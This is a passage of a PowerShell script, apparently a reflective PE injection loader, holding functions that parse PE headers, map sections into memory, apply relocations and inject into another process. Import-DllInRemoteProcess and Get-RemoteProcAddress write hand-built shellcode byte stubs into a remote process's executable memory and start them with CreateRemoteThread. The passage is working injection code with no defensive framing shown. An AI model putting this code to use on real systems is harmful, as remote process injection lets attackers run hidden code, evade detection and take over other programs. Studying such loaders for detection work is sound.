987.  
988.     Function Get-ImageNtHeaders
989.     {
990.         Param(
991.         [Parameter(Position = 0, Mandatory = $true)]
992.         [IntPtr]
993.         $PEHandle,
994.  
995.         [Parameter(Position = 1, Mandatory = $true)]
996.         [System.Object]
997.         $Win32Types
998.         )
999.  
1000.         $NtHeadersInfo = New-Object System.Object
1001.  
1002.  
1003.         $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)
1004.  
1005.  
1006.         [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))
1007.         $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr
1008.         $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)
1009.  
1010.  
1011.         if ($imageNtHeaders64.Signature -ne 0x00004550)
1012.         {
1013.             throw "Invalid IMAGE_NT_HEADER signature."
1014.         }
1015.  
1016.         if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
1017.         {
1018.             $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64
1019.             $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
1020.         }
1021.         else
1022.         {
1023.             $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
1024.             $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32
1025.             $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
1026.         }
1027.  
1028.         return $NtHeadersInfo
1029.     }
1030.  
1031.  
1032.  
1033.     Function Get-PEBasicInfo
1034.     {
1035.         Param(
1036.         [Parameter( Position = 0, Mandatory = $true )]
1037.         [Byte[]]
1038.         $PEBytes,
1039.  
1040.         [Parameter(Position = 1, Mandatory = $true)]
1041.         [System.Object]
1042.         $Win32Types
1043.         )
1044.  
1045.         $PEInfo = New-Object System.Object
1046.  
1047.  
1048.         [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)
1049.         [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null
1050.  
1051.  
1052.         $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types
1053.  
1054.  
1055.         $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)
1056.         $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)
1057.         $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
1058.         $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)
1059.         $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)
1060.  
1061.  
1062.         [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)
1063.  
1064.         return $PEInfo
1065.     }
1066.  
1067.  
1068.  
1069.  
1070.     Function Get-PEDetailedInfo
1071.     {
1072.         Param(
1073.         [Parameter( Position = 0, Mandatory = $true)]
1074.         [IntPtr]
1075.         $PEHandle,
1076.  
1077.         [Parameter(Position = 1, Mandatory = $true)]
1078.         [System.Object]
1079.         $Win32Types,
1080.  
1081.         [Parameter(Position = 2, Mandatory = $true)]
1082.         [System.Object]
1083.         $Win32Constants
1084.         )
1085.  
1086.         if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)
1087.         {
1088.             throw 'PEHandle is null or IntPtr.Zero'
1089.         }
1090.  
1091.         $PEInfo = New-Object System.Object
1092.  
1093.  
1094.         $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types
1095.  
1096.  
1097.         $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle
1098.         $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)
1099.         $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)
1100.         $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)
1101.         $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
1102.  
1103.         if ($PEInfo.PE64Bit -eq $true)
1104.         {
1105.             [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
1106.             $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
1107.         }
1108.         else
1109.         {
1110.             [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
1111.             $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
1112.         }
1113.  
1114.         if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)
1115.         {
1116.             $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'
1117.         }
1118.         elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)
1119.         {
1120.             $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'
1121.         }
1122.         else
1123.         {
1124.             Throw "PE file is not an EXE or DLL"
1125.         }
1126.  
1127.         return $PEInfo
1128.     }
1129.  
1130.  
1131.     Function Import-DllInRemoteProcess
1132.     {
1133.         Param(
1134.         [Parameter(Position=0, Mandatory=$true)]
1135.         [IntPtr]
1136.         $RemoteProcHandle,
1137.  
1138.         [Parameter(Position=1, Mandatory=$true)]
1139.         [IntPtr]
1140.         $ImportDllPathPtr
1141.         )
1142.  
1143.         $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
1144.  
1145.         $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
1146.         $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)
1147.         $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
1148.         if ($RImportDllPathPtr -eq [IntPtr]::Zero)
1149.         {
1150.             Throw "Unable to allocate memory in the remote process"
1151.         }
1152.  
1153.         [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
1154.         $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)
1155.  
1156.         if ($Success -eq $false)
1157.         {
1158.             Throw "Unable to write DLL path to remote process memory"
1159.         }
1160.         if ($DllPathSize -ne $NumBytesWritten)
1161.         {
1162.             Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
1163.         }
1164.  
1165.         $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
1166.         $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA")
1167.  
1168.         [IntPtr]$DllAddress = [IntPtr]::Zero
1169.  
1170.  
1171.         if ($PEInfo.PE64Bit -eq $true)
1172.         {
1173.  
1174.             $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
1175.             if ($LoadLibraryARetMem -eq [IntPtr]::Zero)
1176.             {
1177.                 Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA"
1178.             }
1179.  
1180.  
1181.  
1182.             $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
1183.             $LoadLibrarySC2 = @(0x48, 0xba)
1184.             $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)
1185.             $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
1186.  
1187.             $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)
1188.             $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
1189.             $SCPSMemOriginal = $SCPSMem
1190.  
1191.             Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem
1192.             $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)
1193.             [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)
1194.             $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1195.             Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem
1196.             $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)
1197.             [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)
1198.             $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1199.             Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem
1200.             $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)
1201.             [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)
1202.             $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1203.             Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem
1204.             $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)
1205.  
1206.  
1207.             $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
1208.             if ($RSCAddr -eq [IntPtr]::Zero)
1209.             {
1210.                 Throw "Unable to allocate memory in the remote process for shellcode"
1211.             }
1212.  
1213.             $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
1214.             if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
1215.             {
1216.                 Throw "Unable to write shellcode to remote process memory."
1217.             }
1218.  
1219.             $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
1220.             $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
1221.             if ($Result -ne 0)
1222.             {
1223.                 Throw "Call to CreateRemoteThread to call GetProcAddress failed."
1224.             }
1225.  
1226.  
1227.             [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
1228.             $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
1229.             if ($Result -eq $false)
1230.             {
1231.                 Throw "Call to ReadProcessMemory failed"
1232.             }
1233.             [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
1234.  
1235.             $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1236.             $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1237.         }
1238.         else
1239.         {
1240.             [IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions
1241.             $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
1242.             if ($Result -ne 0)
1243.             {
1244.                 Throw "Call to CreateRemoteThread to call GetProcAddress failed."
1245.             }
1246.  
1247.             [Int32]$ExitCode = 0
1248.             $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)
1249.             if (($Result -eq 0) -or ($ExitCode -eq 0))
1250.             {
1251.                 Throw "Call to GetExitCodeThread failed"
1252.             }
1253.  
1254.             [IntPtr]$DllAddress = [IntPtr]$ExitCode
1255.         }
1256.  
1257.         $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1258.  
1259.         return $DllAddress
1260.     }
1261.  
1262.  
1263.     Function Get-RemoteProcAddress
1264.     {
1265.         Param(
1266.         [Parameter(Position=0, Mandatory=$true)]
1267.         [IntPtr]
1268.         $RemoteProcHandle,
1269.  
1270.         [Parameter(Position=1, Mandatory=$true)]
1271.         [IntPtr]
1272.         $RemoteDllHandle,
1273.  
1274.         [Parameter(Position=2, Mandatory=$true)]
1275.         [IntPtr]
1276.         $FunctionNamePtr,
1277.  
1278.         [Parameter(Position=3, Mandatory=$true)]
1279.         [Bool]
1280.         $LoadByOrdinal
1281.         )
1282.  
1283.         $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
1284.  
1285.         [IntPtr]$RFuncNamePtr = [IntPtr]::Zero
1286.  
1287.         if (-not $LoadByOrdinal)
1288.         {
1289.             $FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr)
1290.  
1291.  
1292.             $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)
1293.             $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
1294.             if ($RFuncNamePtr -eq [IntPtr]::Zero)
1295.             {
1296.                 Throw "Unable to allocate memory in the remote process"
1297.             }
1298.  
1299.             [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
1300.             $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)
1301.             if ($Success -eq $false)
1302.             {
1303.                 Throw "Unable to write DLL path to remote process memory"
1304.             }
1305.             if ($FunctionNameSize -ne $NumBytesWritten)
1306.             {
1307.                 Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
1308.             }
1309.         }
1310.  
1311.         else
1312.         {
1313.             $RFuncNamePtr = $FunctionNamePtr
1314.         }
1315.  
1316.  
1317.         $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
1318.         $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress")
1319.  
1320.  
1321.  
1322.         $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
1323.         if ($GetProcAddressRetMem -eq [IntPtr]::Zero)
1324.         {
1325.             Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress"
1326.         }
1327.  
1328.  
1329.  
1330.  
1331.         [Byte[]]$GetProcAddressSC = @()
1332.         if ($PEInfo.PE64Bit -eq $true)
1333.         {
1334.             $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
1335.             $GetProcAddressSC2 = @(0x48, 0xba)
1336.             $GetProcAddressSC3 = @(0x48, 0xb8)
1337.             $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)
1338.             $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
1339.         }
1340.         else
1341.         {
1342.             $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)
1343.             $GetProcAddressSC2 = @(0xb9)
1344.             $GetProcAddressSC3 = @(0x51, 0x50, 0xb8)
1345.             $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)
1346.             $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)
1347.         }
1348.         $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)
1349.         $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
1350.         $SCPSMemOriginal = $SCPSMem
1351.  
1352.         Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem
1353.         $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)
1354.         [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)
1355.         $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1356.         Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem
1357.         $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)
1358.         [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)
1359.         $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1360.         Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem
1361.         $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)
1362.         [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)
1363.         $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1364.         Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem
1365.         $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)
1366.         [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)
1367.         $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1368.         Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem
1369.         $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)
1370.  
1371.         $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
1372.         if ($RSCAddr -eq [IntPtr]::Zero)
1373.         {
1374.             Throw "Unable to allocate memory in the remote process for shellcode"
1375.         }
1376.         [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
1377.         $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
1378.         if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
1379.         {
1380.             Throw "Unable to write shellcode to remote process memory."
1381.         }
1382.  
1383.         $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
1384.         $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
1385.         if ($Result -ne 0)
1386.         {
1387.             Throw "Call to CreateRemoteThread to call GetProcAddress failed."
1388.         }
1389.  
1390.  
1391.         [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
1392.         $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
1393.         if (($Result -eq $false) -or ($NumBytesWritten -eq 0))
1394.         {
1395.             Throw "Call to ReadProcessMemory failed"
1396.         }
1397.         [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
1398.  
1399.  
1400.         $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1401.         $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1402.  
1403.         if (-not $LoadByOrdinal)
1404.         {
1405.             $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1406.         }
1407.  
1408.         return $ProcAddress
1409.     }
1410.  
1411.  
1412.     Function Copy-Sections
1413.     {
1414.         Param(
1415.         [Parameter(Position = 0, Mandatory = $true)]
1416.         [Byte[]]
1417.         $PEBytes,
1418.  
1419.         [Parameter(Position = 1, Mandatory = $true)]
1420.         [System.Object]
1421.         $PEInfo,
1422.  
1423.         [Parameter(Position = 2, Mandatory = $true)]
1424.         [System.Object]
1425.         $Win32Functions,
1426.  
1427.         [Parameter(Position = 3, Mandatory = $true)]
1428.         [System.Object]
1429.         $Win32Types
1430.         )
1431.  
1432.         for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)
1433.         {
1434.             [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))
1435.             $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)
1436.  
1437.  
1438.             [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))
1439.  
1440.  
1441.  
1442.  
1443.  
1444.             $SizeOfRawData = $SectionHeader.SizeOfRawData
1445.  
1446.             if ($SectionHeader.PointerToRawData -eq 0)
1447.             {
1448.                 $SizeOfRawData = 0
1449.             }
1450.  
1451.             if ($SizeOfRawData -gt $SectionHeader.VirtualSize)
1452.             {
1453.                 $SizeOfRawData = $SectionHeader.VirtualSize
1454.             }
1455.  
1456.             if ($SizeOfRawData -gt 0)
1457.             {
1458.                 Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null
1459.                 [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)
1460.             }
1461.  
1462.  
1463.             if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)
1464.             {
1465.                 $Difference = $SectionHeader.VirtualSize - $SizeOfRawData
1466.                 [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))
1467.                 Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null
1468.                 $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null
1469.             }
1470.         }
1471.     }
1472.  
1473.  
1474.     Function Update-MemoryAddresses
1475.     {
1476.         Param(
1477.         [Parameter(Position = 0, Mandatory = $true)]
1478.         [System.Object]
1479.         $PEInfo,
1480.  
1481.         [Parameter(Position = 1, Mandatory = $true)]
1482.         [Int64]
1483.         $OriginalImageBase,
1484.  
1485.         [Parameter(Position = 2, Mandatory = $true)]
1486.         [System.Object]
1487.         $Win32Constants,
1488.  
1489.         [Parameter(Position = 3, Mandatory = $true)]
1490.         [System.Object]
1491.         $Win32Types
1492.         )
1493.  
1494.         [Int64]$BaseDifference = 0
1495.         $AddDifference = $true
1496.         [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)
1497.  
1498.  
1499.         if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `
1500.                 -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))
1501.         {
1502.             return
1503.         }
1504.  
1505.  
1506.         elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)
1507.         {
1508.             $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)
1509.             $AddDifference = $false
1510.         }
1511.         elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)
1512.         {
1513.             $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)
1514.         }
1515.  
1516.  
1517.         [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))
1518.         while($true)
1519.         {
1520.  
1521.             $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)
1522.  
1523.             if ($BaseRelocationTable.SizeOfBlock -eq 0)
1524.             {
1525.                 break
1526.             }
1527.  
1528.             [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))
1529.             $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2
1530.  
1531.  
1532.             for($i = 0; $i -lt $NumRelocations; $i++)
1533.             {
1534.  
1535.                 $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))
1536.                 [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])
1537.  
1538.  
1539.                 [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF
1540.                 [UInt16]$RelocType = $RelocationInfo -band 0xF000
1541.                 for ($j = 0; $j -lt 12; $j++)
1542.                 {
1543.                     $RelocType = [Math]::Floor($RelocType / 2)
1544.                 }
1545.  
1546.  
1547.  
1548.  
1549.                 if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `
1550.                         -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))
1551.                 {
1552.  
1553.                     [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))
1554.                     [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])
1555.  
1556.                     if ($AddDifference -eq $true)
1557.                     {
1558.                         [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
1559.                     }
1560.                     else
1561.                     {
1562.                         [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))
1563.                     }
1564.  
1565.                     [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
1566.                 }
